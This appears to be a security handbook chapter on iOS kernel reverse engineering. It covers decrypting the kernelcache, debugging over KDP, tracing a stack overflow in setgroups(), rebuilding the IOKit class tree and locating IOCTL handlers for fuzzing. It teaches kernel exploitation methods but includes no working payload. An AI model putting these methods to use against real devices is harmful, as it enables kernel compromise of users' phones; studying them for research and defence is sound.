Chapter 9

Kernel Debugging and Exploitation

So far, all the examples and exploit payloads within this book have concentrated on the iOS user space. However, user space code is very limited in what it can do because of all the kernel-enforced security features. A compromise is therefore not complete unless you look deeper and learn how to attack the kernel and penetrate the last line of defense. Within this chapter, you learn everything that enables you to find security vulnerabilities inside the kernel, to debug the problems you discover, and to turn vulnerabilities into working kernel exploits.

Kernel Structure

Before you can look at the iOS kernel and learn its structure or start to reverse it, you have to acquire a copy of the kernel in binary form. The actual binary you need is called kernelcache.release.*, and you can find it within iOS firmware IPSW archives. However, the kernel binary is in IMG3 file format, which means it is packed and also encrypted. To decrypt it, you need decryption keys and a tool called xpwntool, which has been forked by many people and is available in different versions all over GitHub. You can find the original version of xpwntool at http://github.com/planetbeing/xpwntool.

The decryption key and AES initialization vector to decrypt an IMG3 file are stored within the file itself. They are not stored in plaintext, but encrypted with the device's GID key. The GID key is baked into the hardware of the devices and cannot be extracted. It is shared among devices of the same processor class. This means the iPhone 4, iPod4G, and iPad 1 share the same keys, but other devices like the iPhone 3G(S) or the iPad 2 and iPhone 4S have different keys. Therefore getting the real decryption key for a specific kernel is only possible by code running on a device of the same processor class. Also the GID key is disabled during the booting process before the kernel is started and therefore a bootrom, iBoot or ramdisk level exploit is required to determine the decryption key. This also means that at the time of writing this book there is no way to get the decryption keys for iPad 2 and iPhone 4S kernels, because there is no public low-level exploit for these devices. For all the other devices, this is no problem and the actual keys can be found on websites, like THEiPHONEWiKi at http://theiphonewiki.com/ or within the keys.plist file of redsn0w.

Note
Find code for this chapter at our book's website at www.wiley.com/go/ioshackershandbook.

With the key known, the decryption with xpwntool is pretty easy, and once decrypted the kernel's secrets can be lifted. The following example shows how to use xpwntool to decrypt a kernel:

$ xpwntool kernelcache.iPod4,1_4.3.5_8L1.packed \
    kernelcache.iPod4,1_4.3.5_8L1.decrypted \
    -iv 48c4bac83f853a2308d1525a4a83ac37 \
    -k 4025a88dcb382c794a295ff9cfa32f26602c76497afc01f2c6843c510c9efcfc

The decryption reveals that the kernel binary is actually an ARM Mach-O executable. Aside from the base kernel, it also contains several segments that store all the loaded kernel extensions. Analyzing the strings within the binary further also reveals that the iOS kernel is actually compiled from a non-public tree of the XNU kernel source code. The structure of the iOS kernel is therefore identical to the structure of the Mac OS X kernel. This means that the public version of the XNU kernel helps whenever you try to analyze something in the base kernel, with the exception that the ARM architecture-dependent source code is not available. Aside from this, most of the things you know about Mac OS X do directly apply to iOS, with a few exceptions. You can therefore also find the three major components of XNU inside the iOS kernel. These are the bsd, the mach, and the IOKit components.

Kernel Debugging

When it comes to analyzing a kernel crash or developing a nontrivial kernel exploit, it is necessary to have some feedback about what is going on inside the kernel before a kernel panic occurs. Though binary analysis of the iOS kernel has proven that most of the debugging capabilities of the Mac OS X kernel are also compiled into iOS, it is not as easy to make use of them. This section goes into the debugging options available in iOS in more detail.

The first available debugging option is to deduce the internal kernel state from reading the paniclog that is generated by DumpPanic every time iOS reboots after a kernel panic. These paniclog files are simple text files that look a bit different depending on the type of kernel panic that occurred. Along with general information about the panic, a paniclog contains the current state of the CPU and, if possible, a short kernel backtrace. The system collects all the kernel paniclog files within the directory /Library/Logs/CrashReporter/Panics, which is accessible directly on jailbroken devices. For devices that are not jailbroken, the com.apple.crashreportmover service of the lockdown daemon can be started through the MobileDevice framework, which moves the panic and crash log files to the directory /var/mobile/Library/Logs/CrashReporter. From there they can be retrieved via the com.apple.crashreportcopymobile AFC service. Every time iTunes is connected to a device with paniclog files on it, these services are used to copy the files to your Mac into the ~/Library/Logs/CrashReporter/MobileDevice/<devicename>/Panics directory, from where they can be extracted easily. A typical paniclog looks like this:

Incident Identifier: 26FE1B21-A606-47A7-A382-4E268B94F19C
CrashReporter Key:   28cc8dca9c256b584f6cdf8fae0d263a3160f77d
Hardware Model:      iPod4,1
Date/Time:       2011-10-20 09:56:46.373 +0900
OS Version:      iPhone OS 4.3.5 (8L1)

panic(cpu 0 caller 0x80070098): sleh_abort: prefetch abort in kernel mode: fault_addr=0x41414140
r0: 0x0000000e  r1: 0xcd2dc000  r2: 0x00000118  r3: 0x41414141
r4: 0x41414141  r5: 0x41414141  r6: 0x41414141  r7: 0x41414141
r8: 0x41414141  r9: 0xc0b4c580 r10: 0x41414141 r11: 0x837cc244
12: 0xc0b4c580  sp: 0xcd2dbf84  lr: 0x8017484f  pc: 0x41414140
cpsr: 0x20000033 fsr: 0x00000005 far: 0x41414140

Debugger message: panic
OS version: 8L1
Kernel version: Darwin Kernel Version 11.0.0: Sat Jul  9 00:59:43 PDT 2011; root:xnu-1735.47~1/RELEASE_ARM_S5L8930X
iBoot version: iBoot-1072.61
secure boot?: NO
Paniclog version: 1
Epoch Time:        sec       usec
  Boot    : 0x4e9f70d3 0x00000000
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x4e9f713d 0x000319ff

Task 0x80f07c60: 6227 pages, 79 threads: pid 0: kernel_task
Task 0x80f07a50: 185 pages, 3 threads: pid 1: launchd

The preceding paniclog sample describes a kernel panic in a special kernel that was booted. The panic occurred because the CPU tried to prefetch the next instructions from the address 0x41414140. This indicates that a stack-based buffer overflow overwrote the stored register values and the stored return address with a lot of A characters. The most important information within the paniclog is, however, the value of the LR register, because it contains the address of the instruction following the call to the overflowing function. In this case it allows you to find the code responsible for the overflow. However, this method of debugging is very limited: it does not allow you to backtrace from where the code was called, nor to determine what input was used to reach the offending code. Nevertheless, this method has been the primary method of debugging during kernel exploit development for all the public, pre-iOS 4.3 vulnerabilities that have been used to jailbreak the devices. Only after the release of iOS 4.3 did kernel hackers succeed in using a more powerful debugging capability that is contained in the iOS kernel.
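The manual reading of the register dump described above can be sketched in a few lines of Python. This is only an illustration: the function names parse_registers and controlled_registers are made up for this example, and the filler pattern 0x41414141 is an assumption that matches the sample paniclog.

```python
import re

# Register dump copied from the paniclog sample in this section.
PANICLOG_REGS = """\
r0: 0x0000000e  r1: 0xcd2dc000  r2: 0x00000118  r3: 0x41414141
r4: 0x41414141  r5: 0x41414141  r6: 0x41414141  r7: 0x41414141
r8: 0x41414141  r9: 0xc0b4c580 r10: 0x41414141 r11: 0x837cc244
12: 0xc0b4c580  sp: 0xcd2dbf84  lr: 0x8017484f  pc: 0x41414140
cpsr: 0x20000033 fsr: 0x00000005 far: 0x41414140
"""


def parse_registers(text):
    """Return a dict mapping each register label to its integer value."""
    pairs = re.findall(r"(\w+):\s*0x([0-9a-fA-F]+)", text)
    return {name: int(value, 16) for name, value in pairs}


def controlled_registers(regs, pattern=0x41414141):
    """List registers holding the filler pattern, ignoring bit 0.

    Bit 0 is ignored because the CPU clears it in PC when it branches
    to a Thumb address, which turns 0x41414141 into 0x41414140.
    """
    return sorted(n for n, v in regs.items() if (v | 1) == (pattern | 1))


regs = parse_registers(PANICLOG_REGS)
print("registers holding the filler pattern:", controlled_registers(regs))

# LR has bit 0 set for Thumb code; clearing it gives the return address,
# that is, the instruction following the call to the overflowing function.
return_address = regs["lr"] & ~1
print("return address: 0x%08x" % return_address)
```

Seeing the pattern in PC and in the callee-saved registers at the same time is what points to overwritten saved registers on the stack rather than a single corrupted pointer.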

From binary analysis of the iOS kernelcache file, it has been known for a long time that the kernel debugging protocol KDP used for Mac OS X kernel debugging is also compiled into the iOS kernel. To activate it, the debug boot argument is required or a patched kernel must be booted. This has been possible for newer devices like the iPhone 4 ever since the release of the limera1n bootrom exploit, which was created by George Hotz. But due to broken kernel patches inside the public jailbreaks, initial attempts to use it failed, and KDP was considered broken or disabled by Apple for iOS. However, after a while it was discovered that KDP was actually partially working and that only some of its features resulted in instant kernel crashes on boot. This information made it possible to track down the cause of the problems in the public kernel patches. Nowadays KDP is fully usable.

Initially, using KDP for iOS kernel debugging was something only members of the iOS jailbreak development teams were able to do, because they were the only ones able to boot arbitrary kernels, or to boot recent iOS versions with boot arguments. This first changed when the Chronic Dev Team released an open source version of their jailbreaking tool called syringe. With this code it was finally possible for everyone to boot different kernels or supply arbitrary boot arguments. Meanwhile, the iPhone Dev Team added this functionality into their redsn0w tool, which brought the functionality into the reach of the normal end user. Booting a kernel with activated KDP is now as easy as setting the debug boot argument with the -a option:

$ ./redsn0w  -j -a "debug=0x9"

The debug boot argument is actually a bit field that allows you to select or deselect certain KDP features. Table 9.1 lists the possible debugging features that you can use by toggling the appropriate bits. The supported bits are the same as those available for Mac OS X kernel debugging, and can be extracted from the kernel debugging documentation provided by Apple. However, certain debugging features do not work as expected, or do not work at all. Options to create a kernel dump on panic or on a nonmaskable interrupt (NMI) seem not to work due to the lack of an Ethernet device inside iPhones. Other options, like breaking into the debugger on an NMI, are supposed to work according to reports from Apple developers, but when you try them out, they only cause a panic followed by a reboot. This might be caused by another broken kernel patch. An NMI can be triggered on recent iDevices by pressing the power button and the volume down button at the same time for a few seconds.

Table 9.1 Debugging options selectable by the debug boot argument

Name             Value   Description
DB_HALT          0x01    This halts on boot and waits for a debugger to be attached.
DB_PRT           0x02    This causes kernel printf() statements to be sent to the console.
DB_NMI           0x04    This should halt on NMI.
DB_KPRT          0x08    This causes kernel kprintf() statements to be sent to the console.
DB_SLOG          0x20    This outputs diagnostic information to the system log.
DB_ARP           0x40    This allows the debugger to ARP and route for debugging across routers.
DB_LOG_PI_SCRN   0x100   This disables the graphical panic dialog.
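Because the debug boot argument is a plain bit field, combining or decoding values is simple bitwise arithmetic. The following Python sketch uses the values from Table 9.1; the helper names encode_debug and decode_debug are made up for this illustration.

```python
# Flag values taken from Table 9.1.
DEBUG_FLAGS = {
    "DB_HALT": 0x01,
    "DB_PRT": 0x02,
    "DB_NMI": 0x04,
    "DB_KPRT": 0x08,
    "DB_SLOG": 0x20,
    "DB_ARP": 0x40,
    "DB_LOG_PI_SCRN": 0x100,
}


def encode_debug(names):
    """OR together the bits for the named debugging options."""
    value = 0
    for name in names:
        value |= DEBUG_FLAGS[name]
    return value


def decode_debug(value):
    """Return the names of all options whose bit is set in value."""
    return [name for name, bit in DEBUG_FLAGS.items() if value & bit]


print("debug=0x%x" % encode_debug(["DB_HALT", "DB_KPRT"]))
print(decode_debug(0x9))
```

Decoding the value 0x9 used in the redsn0w example shows that it asks the kernel to halt on boot and wait for a debugger (DB_HALT) and to send kprintf() output to the console (DB_KPRT).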

Before you can use KDP on devices like the iPhone, you need to solve a few problems. KDP is a UDP protocol that can be used over Ethernet or via the serial interface, which are both ports you will not find in iPhones. However, the iPhone dock connector pin-out reveals that at least a serial port can be accessed through pins 12 and 13. Those can be used to build an iPhone dock-connector-to-serial adapter. You can find guidelines on this book's website (www.wiley.com/go/ioshackershandbook) explaining the complete dock connector pin-out, the required parts, and the construction process.

Once you have a dock-connector-to-serial adapter that connects your iPhone to a serial port, you run into another problem with the GNU debugger (GDB) and its KDP support. By default, GDB does not support KDP via serial, because even when serial is used, KDP still encapsulates every message inside a fake Ethernet and UDP packet. Because this problem affects not only iOS, but also Mac OS X kernel debugging, a solution already exists. In 2009 David Elliott created a tool called SerialKDPProxy that acts as a proxy between UDP and KDP over serial. You should use a fork of the original tool that is available on GitHub at https://github.com/stefanesser/serialKDPproxy, because the original tool does not work correctly in combination with Mac OS X Lion. The usage of this tool looks as follows:

$ ./SerialKDPProxy /dev/tty.<serial device name>
Opening /dev/tty.<serial device name>
Waiting for packets, pid=577
AppleH3CamIn: CPU time-base registers mapped at DART translated address:
0x0104502fmi_iop_set_config:192 cmd->reasetup_cyclesAppleH3CamIn:
:se4Driver:
pdleOpennit: driver advertises bootloader pages
AppleNANDLegacyFTL::_FILInit: driver advertises WhiteningData
eD1815PMU::start: DOWN0: 1050mV
tart: set VBUCK1_PRE1 to 950
AppleD1815PMU::start:A2 x 4 = 8,IIAppleNANDFTL::_publishServices:
Creating block device of 3939606 sectors of 8192 bytes
AppleNANDFTL::_publishServices: block device created, ready for work
AppleNANDFTL::setPowerStamappings

With this setup you can finally use GDB to connect to the iOS kernel waiting for a debugger. For best results, you should use the GDB binary provided within the iOS SDK, because it already comes with all the necessary ARM support. To let GDB speak through the SerialKDPProxy, configure it for a remote KDP target and tell it to attach to the localhost:

$ /Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/gdb -arch armv7
GNU gdb 6.3.50-20050815 (Apple version gdb-1705) (Fri Jul  1 10:53:44 UTC 2011)
This GDB was configured as "--host=x86_64-apple-darwin --target=arm-apple-darwin"...
(gdb) target remote-kdp
(gdb) attach 127.0.0.1
Connected.

When you try to use the debugger at that point you see that the usability is very limited because GDB knows nothing about the actual target that is debugged. The backtrace feature does not work as expected and shows only one unknown entry. Also, the examine command incorrectly disassembles the code in ARM mode instead of Thumb mode:

(gdb) bt
#0  0x8006e110 in ?? ()
(gdb) x/5i $pc
0x8006e110:   undefined
0x8006e114:   rscle   r2, sp, r0, lsl #24
0x8006e118:   rscsle  r2, r9, r0, lsl #28
0x8006e11c:   ldrtmi  r4, [r1], -r0, asr #12
0x8006e120:   mrrc2   7, 15, pc, r4, cr15

To get a correct disassembly you have to force GDB to take the T bit in the CPSR register into account:

(gdb) x/6i $pc | $cpsr.t
0x8006e111:   undefined
0x8006e113:   b.n   0x8006e114
0x8006e115:   cmp   r4, #0
0x8006e117:   beq.n 0x8006e0f4
0x8006e119:   cmp   r6, #0
0x8006e11b:   beq.n 0x8006e110
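The expression $pc | $cpsr.t works because the T (Thumb state) flag is bit 5 of the CPSR, and an address with bit 0 set tells the disassembler to decode Thumb instructions. The following Python sketch performs the same computation by hand. The CPSR value is borrowed from the paniclog sample earlier in this section and serves only as an example input; the CPSR of the debugging session itself is not shown in the text.

```python
CPSR_T_BIT = 1 << 5  # Thumb state flag in the ARM CPSR


def is_thumb(cpsr):
    """Return True if the CPSR value indicates Thumb state."""
    return bool(cpsr & CPSR_T_BIT)


def disassembly_address(pc, cpsr):
    """Mimic `$pc | $cpsr.t`: set bit 0 of the address in Thumb state."""
    return pc | (1 if is_thumb(cpsr) else 0)


example_cpsr = 0x20000033  # example value from the paniclog sample
print(is_thumb(example_cpsr))
print("0x%08x" % disassembly_address(0x8006e110, example_cpsr))
```

With the T bit set, the address passed to the examine command becomes 0x8006e111, which matches the first address in the corrected disassembly.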

Solving the broken backtrace problem is not as easy. To get a good backtrace you need to provide a symbolized kernel binary to GDB. Using the decrypted and unpacked kernelcache binary improves the situation, but it provides only a very small set of kernel symbols. A full set of kernel symbols is unavailable because Apple does not want anyone to debug iOS kernels. Therefore, it does not provide an iOS kernel debug kit to the public. However, the provided kernel debug kit for Mac OS X is still useful for iOS kernel debugging, because it allows you to use tools like zynamics BinDiff, which can port symbols even across CPU architectures. Alternatively, the idaiostoolkit provides a larger set of already ported kernel symbols for some iOS kernels.

These kernel symbols can be used as follows:

$ /Developer/Platforms/iPhoneOS.platform/Developer/usr/bin/gdb -arch armv7 kernelcache.symbolized
(gdb) target remote-kdp
(gdb) attach 127.0.0.1
Connected.
(gdb) bt
#0  0x8006e110 in sub_8006E03C ()
#1  0x8006e19e in Debugger ()
#2  0x8007402a in sub_80074020 ()
#3  0x8000a9a0 in kdp_set_ip_and_mac_addresses ()
#4  0x8000ac88 in sub_8000AC14 ()
#5  0x80020cf6 in sub_80020C98 ()
#6  0x8006c31c in sub_8006C300 ()

Now you can set breakpoints anywhere you like. This demonstration sets a breakpoint at the address 0x8017484A, which is the address of the call to copyin() that caused the stack-based buffer overflow in the paniclog demonstration. It is located inside the setgroups() system call:

(gdb) break *0x8017484a
Breakpoint 2 at 0x8017484a
(gdb) c
Continuing.

From there, you continue the execution until your code triggers the breakpoint. Because the setgroups() system call is triggered several times during boot, it is wise to activate this breakpoint only after the system has fully booted. When executing the malicious binary, you indeed end up at the breakpoint:

Breakpoint 2, 0x8017484a in sub_80174810 ()
(gdb) x/5i $pc | $cpsr.t
0x8017484b <sub_80174810+59>:     blx   0x8006cdf0 <copyin>
0x8017484f <sub_80174810+63>:     mov   r8, r0
0x80174851 <sub_80174810+65>:     cbnz   r0, 0x8017488c <sub_80174810+124>
0x80174853 <sub_80174810+67>:     mov   r0, r4
0x80174855 <sub_80174810+69>:     bl   0x80163fc0 <kauth_cred_proc_ref>

You can see that the breakpoint hit just before a call to the copyin() function, which is used inside the kernel to copy data from user space into kernel space. To understand what is going on, you can ask GDB for the parameters to copyin(), which are stored in the R0, R1, and R2 registers. In addition, you also ask for the stack pointer SP and the frame pointer in R7:

(gdb) i r r0 r1 r2 r7 sp
r0             0x2fdff850   803207248
r1             0xcd2cbf20   -852705504
r2             0x200 512
r7             0xcd2cbf7c   -852705412
sp             0xcd2cbf20   -852705504

This shows that the call to copyin() will copy 512 bytes from the user space stack into the kernel space stack. You can also see that copying 512 bytes will overflow the kernel stack buffer, because the frame pointer in R7 is only 92 bytes above the start of the buffer.
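The 92-byte figure follows directly from the register values printed by GDB. The short Python calculation below reproduces it; the variable names are chosen for this illustration only.

```python
# Register values taken from the GDB output above.
buffer_start = 0xcd2cbf20   # R1: kernel destination of copyin(), equal to SP
frame_pointer = 0xcd2cbf7c  # R7
copy_length = 0x200         # R2: number of bytes copyin() will copy

# Space between the start of the buffer and the address held in R7.
room = frame_pointer - buffer_start
# Bytes written at or beyond the address held in R7.
overrun = copy_length - room

print("room before R7: %d bytes" % room)
print("bytes written past that point: %d" % overrun)
```

The copy therefore writes well beyond the 92 bytes available, which is consistent with the saved registers and return address being overwritten in the paniclog sample.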

Kernel Extensions and IOKit Drivers

iOS has no kernel extension binaries in the filesystem. However, this does not mean that iOS does not support the concept of kernel extensions. Instead, all the required kernel extensions are prelinked into the kernelcache binary. This means special segments called __PRELINK_TEXT, __PRELINK_INFO, and __PRELINK_STATE are added to the kernelcache binary. These segments contain all the loaded kernel extensions and additional metadata about them. Working on or with the iOS kernel extensions therefore requires tools to handle the additional Mach-O binaries within the kernelcache. Earlier versions of Hex-Rays' IDA Pro could not deal with these prelinked kernel extensions by default, and required help from an IDAPython script that searched for all the KEXT binaries inside the kernelcache and added additional segments to the IDA database. The output of this script is shown in Figure 9.1. With the release of version 6.2 of IDA, these files are now handled by default.

Figure 9.1 Kernel extensions found in the kernelcache

Reversing the IOKit Driver Object Tree

IOKit device drivers are special kinds of kernel extensions that use the IOKit API inside the iOS kernel and are implemented in a special limited version of C++. The implementation and definition of the IOKit are located in the iokit subdirectory of the XNU source code; and the C++ kernel implementation, including all the available base objects, is located in the libkern subdirectory.

Because most of the IOKit drivers are closed source components and do not come with source code, the usage of C++ makes things a bit more complicated from the reverse engineer's point of view. Object hierarchy has to be reconstructed from the binary, and determining the call-graph is more complicated for object-oriented programs. At the same time, the use of C++ introduces typical C++-only vulnerability classes into the kernel, which makes kernel exploitation more interesting.

To completely analyze the functionality of an IOKit driver, it is important to be able to reconstruct the C++ object hierarchy from the binary. Under normal circumstances, this would be a complicated task, but luckily IOKit driver binaries follow several simple rules when defining new IOKit objects:

  • IOKit objects always extend other IOKit objects or objects derived from the IOKit base objects.
  • For every IOKit object, a metaclass is registered that reveals the name of the object and a pointer to the parent.
  • The metaclass definition is directly followed by the class definition in the binary for iOS 4 and nearby it for iOS 5.

Because these rules are always followed, it is possible to reconstruct the whole IOKit object tree from the binary only. As a starting point, implement an IDAPython script that searches for all cross-references of the _ZN11OSMetaClassC2EPKcPKS_j symbol. This symbol is the constructor of the OSMetaClass object that is defined as follows:

   /*!
    * @function OSMetaClass
    * @param className  A C string naming the C++ class
    *                   that this OSMetaClass represents.
    * @param superclass The OSMetaClass object representing the superclass
    *                   of this metaclass's class.
    * @param classSize  The allocation size of the represented C++ class.
    */
    OSMetaClass(const char * className,
        const OSMetaClass  * superclass,
        unsigned int         classSize);

From the definition, you can see that the OSMetaClass constructor is called with a string containing the name of the C++ class that the metaclass represents and with a pointer to the parent metaclass. At the binary level this looks like what is shown in Figure 9.2.

Figure 9.2 OSOrderedSet metaclass constructor

The OSMetaClass constructor is called at the binary level with four, instead of three, parameters. The first parameter, which is passed in the R0 register, is the implicit C++ this pointer and therefore contains a pointer to the metaclass currently being constructed. The other parameters (className, superclass, and classSize) are passed within the R1, R2, and R3 registers, respectively. To reconstruct the C++ class tree you have to start at the call to the OSMetaClass constructor and trace the values of the R1 and R2 registers backward from this position. In addition to that, you have to determine the current function and find all cross-references to it. There should be only one such cross-reference. From the cross-reference found, you can trace the value of the R0 register back to find a pointer to the new metaclass. (See Figure 9.3.)

Figure 9.3 Call of the OSOrderedSet metaclass constructor

Within the disassembly you can see that immediately after the constructor has been called, a pointer to the metaclass's method table is written to the object. This is useful because it allows you to find the method table responsible for an object. Within the kernelcache binary, the method table of the metaclass is always directly followed by the method table of the normal class. Although all of this demonstration occurs inside the iOS 4.3.5 kernel binary, the same applies to the iOS 5 kernel. The object initialization was changed a bit, and therefore in iOS 5 forward- and backtracking of register values is a bit more complicated.

With all this information, it is now a two-step process to rebuild the C++ class tree. In the first step, all calls to the OSMetaClass constructor are collected, including the four data elements className, metaclass, superclass, and methodtable. For a Python script, the best approach is to create a dictionary and use the metaclass as a key. This allows the second step to simply go through all the collected classes and construct the link to the parent class. From this data structure, it is a straightforward task to generate a graph in a .gml file format (for example) that can be visualized with free tools like yEd Graph Editor from yWorks, as shown in Figure 9.4. An IDAPython script that performs the whole tree reconstruction and outputs a graph file is part of the idaiostoolkit.
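The second step and the graph output can be sketched in plain Python, independent of IDA. This is not the idaiostoolkit script: the record layout, the function names build_tree and to_gml, and all addresses below are made-up placeholders standing in for the data that the first step would collect from a real kernelcache.

```python
# Placeholder output of step one. Each record is
# (metaclass, className, superclass metaclass, methodtable).
# The addresses are invented for this example.
RECORDS = [
    (0x1000, "OSObject", 0, 0x2000),
    (0x1010, "OSCollection", 0x1000, 0x2100),
    (0x1020, "OSOrderedSet", 0x1010, 0x2200),
    (0x1030, "IORegistryEntry", 0x1000, 0x2300),
    (0x1040, "IOService", 0x1030, 0x2400),
]


def build_tree(records):
    """Index classes by metaclass pointer, then link each to its parent."""
    classes = {}
    for metaclass, name, superclass, methodtable in records:
        classes[metaclass] = {
            "name": name,
            "super": superclass,
            "methodtable": methodtable,
            "parent": None,
        }
    # Second pass: resolve the superclass pointer to the parent's name.
    for info in classes.values():
        parent = classes.get(info["super"])
        if parent is not None:
            info["parent"] = parent["name"]
    return classes


def to_gml(classes):
    """Render the class tree as a directed graph in GML format."""
    lines = ["graph [", "  directed 1"]
    for metaclass, info in classes.items():
        lines.append('  node [ id %d label "%s" ]' % (metaclass, info["name"]))
    for metaclass, info in classes.items():
        if info["super"] in classes:
            lines.append("  edge [ source %d target %d ]"
                         % (info["super"], metaclass))
    lines.append("]")
    return "\n".join(lines)


classes = build_tree(RECORDS)
gml = to_gml(classes)
print(gml)
```

Using the metaclass pointer as the dictionary key makes the parent lookup a single dictionary access, because the superclass argument of the constructor is itself a metaclass pointer.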

Figure 9.4 yEd showing a visual display of the IOKit class tree

In addition to being able to display a visual representation of the IOKit class hierarchy, the inheritance relationship between classes is very useful when reversing the functionality of an IOKit class. With this information it is possible to check the methods inside the method table of a class and determine if the same method is also used in the parent class. If the method is not found in the parent's method table, it has been overridden in the child class. If it is found, it was just inherited from the parent. This allows you to distinguish specific functionality added by a child class.

When reversing IOKit drivers it comes in handy that, although the drivers themselves are closed source and come without symbols, the IOKit base classes are part of the main kernel and come with symbols and source code. And because these are C++ class methods, their symbols are in mangled form and reveal the method prototype even without access to the source code. This also means that walking up the inheritance tree, from a given method, allows you to determine if the overridden method was one of the methods of an IOKit base class. In this case, the original symbol can be used to create a new symbol for the derived class, as shown in the following example from the method table of the IOFlashControllerUserClient class:

805584E8   DCD _ZN9IOService16allowPowerChangeEm+1
805584EC   DCD _ZN9IOService17cancelPowerChangeEm+1
805584F0   DCD _ZN9IOService15powerChangeDoneEm+1
805584F4   DCD sub_80552B24+1
805584F8   DCD _ZN12IOUserClient24registerNotificationPortEP8ipc_portmy+1
805584FC   DCD _ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary+1

You can then compare this to the method table of the parent class IOUserClient, which reveals the original symbol of the overridden method:

80270120   DCD _ZN9IOService16allowPowerChangeEm+1
80270124   DCD _ZN9IOService17cancelPowerChangeEm+1
80270128   DCD _ZN9IOService15powerChangeDoneEm+1
8027012C   DCD _ZN12IOUserClient14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv+1
80270130   DCD _ZN12IOUserClient24registerNotificationPortEP8ipc_portmy+1
80270134   DCD _ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary+1

The overridden method is called externalMethod, and after demangling the symbol further you get its full prototype:

externalMethod(unsigned int, IOExternalMethodArguments *,
IOExternalMethodDispatch *, OSObject *, void *)

With this knowledge you now know that the method at address 0x80552B24 most probably was called IOFlashControllerUserClient::externalMethod() in the original source code. This is good to know because externalMethod() dispatches the driver methods that user space code can call directly, and it is therefore a starting point to find vulnerabilities.
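The comparison of the two method tables can be automated. The following Python sketch uses the table excerpts shown above (with the +1 Thumb offset stripped) and derives a symbol for the child class by swapping the class name inside the mangled parent symbol. The function names are made up for this illustration, and the renaming is a simplification: it only handles slots whose parent symbol belongs directly to the parent class and whose mangled name contains no substitutions that depend on the class name.

```python
CHILD_CLASS = "IOFlashControllerUserClient"
PARENT_CLASS = "IOUserClient"

# Method table excerpts from the listings above, without the +1 offset.
CHILD_TABLE = [
    "_ZN9IOService16allowPowerChangeEm",
    "_ZN9IOService17cancelPowerChangeEm",
    "_ZN9IOService15powerChangeDoneEm",
    "sub_80552B24",
    "_ZN12IOUserClient24registerNotificationPortEP8ipc_portmy",
    "_ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary",
]
PARENT_TABLE = [
    "_ZN9IOService16allowPowerChangeEm",
    "_ZN9IOService17cancelPowerChangeEm",
    "_ZN9IOService15powerChangeDoneEm",
    "_ZN12IOUserClient14externalMethodEjP25IOExternalMethodArguments"
    "P24IOExternalMethodDispatchP8OSObjectPv",
    "_ZN12IOUserClient24registerNotificationPortEP8ipc_portmy",
    "_ZN12IOUserClient12initWithTaskEP4taskPvmP12OSDictionary",
]


def rename_for_child(symbol, parent, child):
    """Swap the length-prefixed class name in a mangled method symbol."""
    old_prefix = "_ZN%d%s" % (len(parent), parent)
    if not symbol.startswith(old_prefix):
        return None  # method is defined further up the inheritance tree
    return "_ZN%d%s" % (len(child), child) + symbol[len(old_prefix):]


def find_overrides(child_table, parent_table, parent, child):
    """Return (slot, child entry, proposed symbol) for differing slots."""
    result = []
    for slot, (mine, theirs) in enumerate(zip(child_table, parent_table)):
        if mine != theirs:
            result.append((slot, mine, rename_for_child(theirs, parent, child)))
    return result


overrides = find_overrides(CHILD_TABLE, PARENT_TABLE, PARENT_CLASS, CHILD_CLASS)
for slot, entry, proposed in overrides:
    print("slot %d: %s -> %s" % (slot, entry, proposed))
```

For the excerpt above, only the fourth slot differs, and the proposed symbol demangles to IOFlashControllerUserClient::externalMethod() with the same argument list as the parent's method.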

Finding Vulnerabilities in Kernel Extensions

The most common vulnerabilities in kernel extensions across all operating systems are mistakes in the IOCTL handling subroutines of registered character or block devices. To find these vulnerabilities, you must first locate all registered devices and then locate their IOCTL handlers. At the binary level this comes down to searching for calls to the functions cdevsw_add(), cdevsw_add_with_bdev(), and bdevsw_add(). These functions add a character device, a character device together with a block device, or a block device, respectively. When a device is registered, a structure of type cdevsw or bdevsw that contains all the handlers for the specific device must be supplied. Both structures define an element called d_ioctl that is a function pointer to the IOCTL handler:

struct bdevsw {
   open_close_fcn_t *d_open;
   open_close_fcn_t *d_close;
   strategy_fcn_t   *d_strategy;
   ioctl_fcn_t      *d_ioctl;
   dump_fcn_t       *d_dump;
   psize_fcn_t      *d_psize;
   int              d_type;
};
struct cdevsw {
   open_close_fcn_t *d_open;
   open_close_fcn_t *d_close;
   read_write_fcn_t *d_read;
   read_write_fcn_t *d_write;
   ioctl_fcn_t      *d_ioctl;
   stop_fcn_t       *d_stop;
   reset_fcn_t      *d_reset;
   struct tty       **d_ttys;
   select_fcn_t     *d_select;
   mmap_fcn_t       *d_mmap;
   strategy_fcn_t   *d_strategy;
   void             *d_reserved_1;
   void             *d_reserved_2;
   int              d_type;
};

The idaiostoolkit contains an IDAPython script that scans the whole kernelcache binary for all registered character and block devices and outputs their IOCTL handlers. The handlers found can then be evaluated manually or attacked with an IOCTL fuzzer.
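Once the address of a cdevsw or bdevsw structure is known, reading the d_ioctl pointer is a matter of unpacking the structure. The following Python sketch is not the idaiostoolkit script. It assumes a 32-bit little-endian ARM kernel in which every field of the structures above occupies four bytes without padding, and it runs on made-up sample bytes instead of a real kernelcache.

```python
import struct

# Field order copied from the structure definitions above.
CDEVSW_FIELDS = [
    "d_open", "d_close", "d_read", "d_write", "d_ioctl", "d_stop",
    "d_reset", "d_ttys", "d_select", "d_mmap", "d_strategy",
    "d_reserved_1", "d_reserved_2", "d_type",
]
BDEVSW_FIELDS = [
    "d_open", "d_close", "d_strategy", "d_ioctl", "d_dump", "d_psize",
    "d_type",
]


def parse_devsw(raw, fields):
    """Unpack one 32-bit little-endian word per structure field."""
    values = struct.unpack_from("<%dI" % len(fields), raw)
    return dict(zip(fields, values))


def ioctl_handler(raw, fields):
    """Return the IOCTL handler address with the Thumb bit cleared."""
    return parse_devsw(raw, fields)["d_ioctl"] & ~1


# Made-up cdevsw contents: only d_ioctl (fifth field) is interesting here.
sample_words = [0x80123401, 0x80123411, 0, 0, 0x80123455] + [0] * 9
sample_cdevsw = struct.pack("<14I", *sample_words)

print("d_ioctl handler at 0x%08x" % ioctl_handler(sample_cdevsw, CDEVSW_FIELDS))
```

Under these assumptions d_ioctl sits at offset 16 in cdevsw and at offset 12 in bdevsw, which is why the field lists are kept separate.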

